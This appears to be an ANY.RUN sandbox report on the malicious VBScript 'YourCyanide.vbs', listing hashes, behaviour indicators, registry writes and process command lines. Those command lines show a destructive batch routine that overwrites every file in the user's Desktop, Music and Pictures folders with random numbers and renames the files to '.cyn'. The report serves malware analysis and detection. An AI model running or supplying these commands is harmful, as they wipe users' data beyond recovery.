analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

YourCyanide.vbs

Full analysis: https://app.any.run/tasks/9dd54721-89cc-4b63-a436-70d9bcd47bea
Verdict: Malicious activity
Analysis date: May 20, 2022, 23:48:07
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

7BB050D1BD8CBEB89FFB0735EDDE6930

SHA1:

B3A65FBEF6880024F7FD649D7E916656F0930A3A

SHA256:

07A17C8898C9EF4EF143F7E7EB882A43D47D14C9B493101221A425995A0068E4

SSDEEP:

48:0T32ZlXI2Zl02ZT82ZlXI2Zl02ZT62/vlXI2Zl02ZTpP2ZlXI2Zl02ZTO2ZlXI2k:jTXXTDZTXXTD7lXXTDSTXXTDrTXXTDKV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Reads the computer name

      • WScript.exe (PID: 2444)
      • cmd.exe (PID: 2316)
    • Checks supported languages

      • cmd.exe (PID: 892)
      • WScript.exe (PID: 2444)
      • cmd.exe (PID: 2104)
      • cmd.exe (PID: 2360)
      • cmd.exe (PID: 3472)
      • cmd.exe (PID: 3380)
      • cmd.exe (PID: 3992)
      • cmd.exe (PID: 3224)
      • cmd.exe (PID: 2124)
      • cmd.exe (PID: 1688)
      • cmd.exe (PID: 2604)
      • cmd.exe (PID: 2112)
      • cmd.exe (PID: 3548)
      • cmd.exe (PID: 2372)
      • cmd.exe (PID: 3072)
      • cmd.exe (PID: 3720)
      • cmd.exe (PID: 4020)
      • cmd.exe (PID: 1784)
      • cmd.exe (PID: 2316)
      • cmd.exe (PID: 2216)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2444)
    • Executed via COM

      • DllHost.exe (PID: 3760)
  • INFO

    • Checks Windows Trust Settings

      • WScript.exe (PID: 2444)
    • Checks supported languages

      • explorer.exe (PID: 1560)
      • DllHost.exe (PID: 3760)
    • Manual execution by user

      • explorer.exe (PID: 1560)
    • Reads the computer name

      • explorer.exe (PID: 1560)
      • DllHost.exe (PID: 3760)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
79
Monitored processes
22
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs explorer.exe no specs Shell Security Editor no specs

Process information

PID
CMD
Path
Indicators
Parent process
2444"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\YourCyanide.vbs"C:\Windows\System32\WScript.exeExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
892"C:\Windows\System32\cmd.exe" /c echo cd C:\Users\admin\Desktop\ >> C:\Users\admin\Enc.bat C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2360"C:\Windows\System32\cmd.exe" /c echo for /r %%f in (*.*) do ren %%f %random%*%random%.cyn >> C:\Users\admin\Enc.bat C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3472"C:\Windows\System32\cmd.exe" /c echo for /r %%f in (*.*) do echo %random%%random% > %%f >> C:\Users\admin\Enc.bat C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3992"C:\Windows\System32\cmd.exe" /c echo cd C:\Users\admin\Music\ >> C:\Users\admin\Enc.bat C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3224"C:\Windows\System32\cmd.exe" /c echo for /r %%f in (*.*) do ren %%f %random%*%random%.cyn >> C:\Users\admin\Enc.bat C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2104"C:\Windows\System32\cmd.exe" /c echo for /r %%f in (*.*) do echo %random%%random% > %%f >> C:\Users\admin\Enc.bat C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3380"C:\Windows\System32\cmd.exe" /c echo cd C:\Users\admin\Pictures\ >> C:\Users\admin\Enc.bat C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2372"C:\Windows\System32\cmd.exe" /c echo for /r %%f in (*.*) do ren %%f %random%*%random%.cyn >> C:\Users\admin\Enc.bat C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2604"C:\Windows\System32\cmd.exe" /c echo for /r %%f in (*.*) do echo %random%%random% > %%f >> C:\Users\admin\Enc.bat C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
717
Read events
709
Write events
8
Delete events
0

Modification events

(PID) Process:(2444) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2444) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2444) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2444) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
0
Suspicious files
0
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
892cmd.exeC:\Users\admin\Enc.battext
MD5:471EEC9A5E59F7A6CCD18EFA5CE30C10
SHA256:7F907A19655FF35973FC5BFF52E7ACE73B88CB23D1A539703C4B066A6A6CDDE7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info